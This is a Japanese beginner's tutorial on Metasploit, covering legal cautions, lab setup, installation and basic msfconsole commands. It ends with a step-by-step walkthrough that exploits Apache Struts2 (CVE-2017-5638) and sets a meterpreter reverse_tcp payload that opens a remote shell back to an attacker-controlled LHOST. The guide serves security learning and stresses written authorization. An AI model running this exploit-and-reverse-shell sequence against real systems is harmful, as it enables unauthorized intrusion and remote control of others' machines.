Metasploitでペネトレーションテストを始める｜初心者向け使い方ガイド

ペネトレーションテストは、企業のセキュリティ強化に欠かせない重要な取り組みです。しかし、初心者にとってMetasploitのような専門ツールは「どこから手をつけていいか分からない」「法的リスクが心配」という不安が大きいのではないでしょうか。この記事では、Metasploitの基礎知識から実践的な使い方まで、初心者が安全に学べる手順を解説します。法的注意点も詳しく説明しますので、安心してペネトレーションテストの第一歩を踏み出せます。

Metasploitとは？ペネトレーションテストツールの基礎知識

Metasploitは、世界中のセキュリティ専門家が利用する代表的なペネトレーションテストツールです。システムの脆弱性を発見し、実際に攻撃をシミュレートすることで、セキュリティ上の弱点を特定できます。

Metasploit Frameworkの概要と役割

Metasploit Frameworkは、Rapid7社が開発しているオープンソースのセキュリティ診断フレームワークです。2003年にリリースされて以来、継続的にアップデートされ、現在では2,000種類以上のエクスプロイト（脆弱性を利用した攻撃コード）を搭載しています。

主な役割は以下の3つです。

• 脆弱性の発見：システムやアプリケーションに存在するセキュリティホールを特定します
• 侵入テストの実施：発見した脆弱性を実際に利用して、どの程度の被害が発生しうるかを検証します
• セキュリティ対策の検証：既存の防御策が適切に機能しているかを確認します

企業のセキュリティ診断では、Metasploitを使って自社システムの弱点を把握し、攻撃者に悪用される前に対策を講じることが可能です。

有償版と無償版の違い

Metasploitには無償版（Metasploit Framework）と有償版（Metasploit Pro）の2種類があります。初心者や中小企業が学習目的で使用する場合は、無償版でも十分な機能を利用できます。

無償版はコマンドライン操作が中心のため、初心者には学習コストがかかります。しかし、基本的な診断機能は十分に備わっているため、社内での検証や学習には最適です。一方、有償版はGUI操作で直感的に使え、詳細なレポート機能も搭載されているため、経営層への報告が必要な企業には有効です。

中小企業が使うべきシーン

中小企業でMetasploitを活用するのは、主に以下の3つのシーンです。

• 新規システム導入前の脆弱性診断：外部から導入するソフトウェアやクラウドサービスに既知の脆弱性がないか確認
• 定期的なセキュリティ診断：年に1～2回、自社の業務システムやWebサイトに新たな脆弱性が発生していないかチェック
• インシデント発生後の原因調査：不正アクセスやマルウェア感染が起きた際、侵入経路を特定するための診断

ただし、Metasploitは非常に強力なツールであるため、使用には適切な知識と権限が必要です。誤った使い方をすると、自社システムに重大な障害を引き起こしたり、法的トラブルに発展したりするリスクがあります。

他のペネトレーションテストツールとの比較

ペネトレーションテストツールは数多く存在しますが、目的や使いやすさに違いがあります。以下は代表的なツールとの比較です。

初心者がまず学ぶべきツールは、操作がシンプルなNmapです。ネットワーク上のデバイスやサービスを発見する基本的なスキャンツールで、Metasploitと併用することで診断の精度が向上します。Webサイトの診断を重視する場合は、Burp SuiteやOWASP ZAPも検討してください。

Metasploitを使う前に知っておくべき重要な注意点

Metasploitは非常に強力なツールですが、誤った使い方をすると法的責任を問われる危険性があります。ここでは、ペネトレーションテストを実施する前に必ず理解しておくべき法的・倫理的な注意点を解説します。

不正アクセス禁止法との関係

日本では、**不正アクセス行為の禁止等に関する法律（不正アクセス禁止法）**により、他人のコンピュータに無断でアクセスする行為は犯罪とされています。違反した場合、3年以下の懲役または100万円以下の罰金が科せられる可能性があります。

さらに、刑法第168条の2（不正指令電磁的記録作成等）および第168条の3（不正指令電磁的記録取得等）では、ウイルスやマルウェアを作成・配布する行為も処罰の対象です。Metasploitには、悪意のあるペイロード（攻撃コード）が含まれているため、使い方を誤るとこれらの法律に抵触するリスクがあります。

実際に、2019年には大手企業の元社員が、許可なく社内システムに対してペネトレーションテストツールを使用し、不正アクセス禁止法違反で逮捕された事例があります。たとえ「セキュリティ強化のため」という善意の目的であっても、適切な承認を得ずに実施すれば違法行為となります。

許可なしの診断は違法行為

ペネトレーションテストを実施する際は、必ず対象システムの管理者から事前に書面で許可を取得してください。口頭での承認だけでは、トラブルが発生した際に「そんな許可は出していない」と主張される可能性があります。

許可を取得する際には、以下の項目を明確にした契約書や同意書を作成しましょう。

• 診断対象のシステム名・範囲
• 診断実施期間と時間帯
• 使用するツールの名称（Metasploit等）
• 診断によって発生しうるリスクの説明
• 診断結果の取り扱い方法

特に、外部のクライアント企業やクラウドサービスに対して診断を行う場合は、サービス利用規約で「脆弱性診断の実施が禁止されている」ケースもあります。事前に規約を確認し、必要に応じてサービス提供元に診断許可を申請してください。

社内ネットワークでの利用ルール

自社のシステムであっても、Metasploitを本番環境で直接使用するのは避けるべきです。ペネトレーションテストは、システムに負荷をかけたり、一時的にサービスを停止させたりする可能性があります。

安全に診断を行うには、以下のような隔離された検証環境を構築してください。

• 仮想マシン（VirtualBox、VMware等）：本番環境と分離した仮想環境で診断
• テスト専用サーバー：本番と同じ構成のテストサーバーを用意
• ローカルネットワーク：インターネットから切り離した社内LANで実施

また、診断実施前には必ずシステムのバックアップを取得し、万が一トラブルが発生しても復旧できる体制を整えておくことが重要です。

よくある誤用と実際の被害事例

Metasploitの誤用によって実際に発生したトラブル事例を紹介します。

• 事例1：本番環境での誤診断：テスト環境のIPアドレスと本番環境のIPアドレスを間違えて入力し、営業中のECサイトに対してDoS攻撃（サービス妨害攻撃）を実行。数時間サイトがダウンし、数百万円の機会損失が発生しました
• 事例2：エクスプロイトの暴走：未検証のエクスプロイトを使用した結果、ターゲットのサーバーがクラッシュ。データベースが破損し、復旧に1週間を要した事例があります
• 事例3：情報漏洩：診断で取得した認証情報をローカルPCに保存したまま放置し、第三者に盗まれて不正アクセスに悪用された事例も報告されています

これらの事例から学ぶべきは、**「Metasploitは教育と学習のためのツールであり、実運用には高度な専門知識が必要」**ということです。初心者が独学で実施するのではなく、経験豊富なセキュリティ専門家の指導を受けるか、専門企業に診断を委託することを強く推奨します。

Metasploitのインストールから初期設定まで

ここからは、Metasploitを実際にインストールし、初期設定を行う手順を解説します。安全な学習環境を構築するために、手順を正確に実行してください。

推奨OS環境とシステム要件

Metasploitは、Windows、macOS、Linuxの各OSで動作しますが、Kali Linuxでの使用が最も推奨されます。Kali Linuxは、セキュリティ診断に特化したLinuxディストリビューションで、Metasploitをはじめとする数百種類のセキュリティツールがプリインストールされています。

推奨されるシステム要件は以下の通りです。

• OS：Kali Linux 2023.1以降（またはUbuntu 22.04以降）
• CPU：2コア以上（4コア推奨）
• メモリ：4GB以上（8GB推奨）
• ストレージ：20GB以上の空き容量
• ネットワーク：インターネット接続（アップデート用）

初心者の方は、VirtualBoxやVMware Workstation Playerなどの仮想化ソフトウェアを使って、Kali Linuxを仮想マシンとして構築することをおすすめします。これにより、本体のOSに影響を与えずに安全に学習できます。

インストール手順（3ステップ）

Kali Linuxを使用する場合、Metasploitは既にインストールされているため、追加のインストール作業は不要です。しかし、UbuntuやDebianなどの一般的なLinux環境でインストールする場合は、以下の手順を実行してください。

ステップ1：システムのアップデート

まず、パッケージリストを最新の状態に更新します。

sudo apt update && sudo apt upgrade -y

ステップ2：必要なパッケージのインストール

Metasploitの動作に必要な依存パッケージをインストールします。

sudo apt install curl gpg -y

ステップ3：Metasploitのインストール

公式のインストールスクリプトを実行してMetasploitをインストールします。

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

chmod 755 msfinstall

sudo ./msfinstall

インストールが完了すると、msfconsoleコマンドでMetasploitを起動できるようになります。

データベース接続と初期設定

Metasploitは、診断結果や脆弱性情報を管理するためにPostgreSQLデータベースを使用します。初回起動時にデータベースを接続する設定を行いましょう。

まず、PostgreSQLサービスを起動します。

sudo systemctl start postgresql

次に、Metasploitのデータベースを初期化します。

sudo msfdb init

データベースの接続状態を確認するには、Metasploitのコンソールを起動してから以下のコマンドを実行します。

msfconsole

db_status

「postgresql connected」と表示されれば、データベース接続は正常に完了しています。もし接続エラーが表示される場合は、PostgreSQLサービスが正しく起動しているか確認してください。

アップデート方法と動作確認

Metasploitは頻繁に更新され、新しいエクスプロイトや機能が追加されます。定期的にアップデートを実行して、最新の状態を維持しましょう。

アップデートコマンドは以下の通りです。

sudo apt update && sudo apt install metasploit-framework

または、Metasploitのコンソール内から以下のコマンドでもアップデートできます。

msfupdate

動作確認として、Metasploitのコンソールを起動してみましょう。

msfconsole

起動すると、Metasploitのロゴとバージョン情報が表示され、コマンド入力待ちの状態になります。これで基本的なセットアップは完了です。

初心者が覚えるべきMetasploitの基本コマンド5選

Metasploitには数百種類のコマンドがありますが、初心者がまず覚えるべき基本コマンドは5つです。これらを使いこなせれば、簡単な脆弱性診断を実施できるようになります。

脆弱性検索（search）コマンド

searchコマンドは、Metasploitに登録されているエクスプロイトやモジュールを検索するための基本コマンドです。診断対象のソフトウェア名やCVE番号（脆弱性識別番号）を指定して、該当するエクスプロイトを見つけます。

例えば、Apache Struts2の脆弱性を検索する場合は、以下のように入力します。

search struts

検索結果には、エクスプロイトの名称、ランク（信頼性）、説明が表示されます。特定のCVE番号で検索する場合は、以下のように指定します。

search cve:2017-5638

検索結果が多い場合は、typeオプションでエクスプロイトのみに絞り込むことも可能です。

search type:exploit struts

exploit選択とオプション設定

検索で見つけたエクスプロイトを使用するには、useコマンドでモジュールを選択します。

use exploit/multi/http/struts2_content_type_ognl

モジュールを選択すると、プロンプトが変わり、そのエクスプロイトに必要なオプションを設定できるようになります。設定可能なオプションを確認するには、show optionsコマンドを使用します。

show options

表示される項目のうち、Required列が「yes」になっているものは必須パラメータです。例えば、RHOSTターゲットのIPアドレス）は必ず設定する必要があります。

オプションを設定するには、setコマンドを使います。

set RHOST 192.168.1.100

設定内容を確認するには、再度show optionsを実行してください。

ターゲット設定とペイロード選択

エクスプロイトを実行する際には、攻撃が成功した後に実行されるペイロード（攻撃コード）を選択します。ペイロードには、リモートシェル（遠隔操作）を取得するものや、ファイルをアップロードするものなど、様々な種類があります。

利用可能なペイロードを確認するには、以下のコマンドを使用します。

show payloads

初心者には、reverse_tcpペイロードが推奨されます。これは、攻撃者側のマシンに接続を返す仕組みで、ファイアウォールを回避しやすい特徴があります。

set PAYLOAD linux/x86/meterpreter/reverse_tcp

ペイロードを選択したら、攻撃者側のIPアドレス（LHOST）とポート番号（LPORT）を設定します。

set LHOST 192.168.1.10

set LPORT 4444

これで、攻撃が成功した際に、指定したIPアドレスとポートに接続が返ってきます。

実行と結果確認の手順

すべてのオプションを設定したら、exploitコマンドまたはrunコマンドでエクスプロイトを実行します。

exploit

または

run

エクスプロイトが成功すると、Meterpreterセッション（リモート操作可能な状態）が開始されます。セッションが確立されたら、以下のような基本コマンドでターゲットを操作できます。

• sysinfo：ターゲットのシステム情報を表示
• ls：ファイル一覧を表示
• pwd：現在のディレクトリを表示
• shell：通常のシェルモードに移行

診断が終了したら、exitコマンドでセッションを終了し、Metasploitのコンソールに戻ります。

exit

ただし、繰り返しになりますが、これらのコマンドを実際に使用する際は、必ず許可を得た環境でのみ実行してください。無許可での実行は違法行為です。

まとめ

この記事では、Metasploitの基礎知識から実践的な使い方まで、初心者が安全に学ぶための手順を解説しました。重要なポイントは以下の3つです。

• 法的リスクの理解：Metasploitは強力なツールですが、許可なく使用すると不正アクセス禁止法違反となります。必ず事前に書面で許可を取得し、安全な検証環境で実施してください
• 適切な学習環境の構築：Kali Linuxを仮想マシンで構築し、本番環境から隔離された環境で学習することが重要です。初期設定とデータベース接続を正しく行いましょう
• 基本コマンドの習得：search、use、set、show options、exploitの5つの基本コマンドをマスターすれば、簡単な脆弱性診断を実施できるようになります

次のステップとしては、実際の脆弱性診断の手法や、より高度なエクスプロイトの使い方を学ぶことをおすすめします。ただし、Metasploitの実践的な運用には高度な専門知識が必要であり、誤った使い方はシステム障害や法的トラブルにつながります。中小企業でセキュリティ診断を本格的に実施する場合は、専門のセキュリティ企業に委託することも検討してください。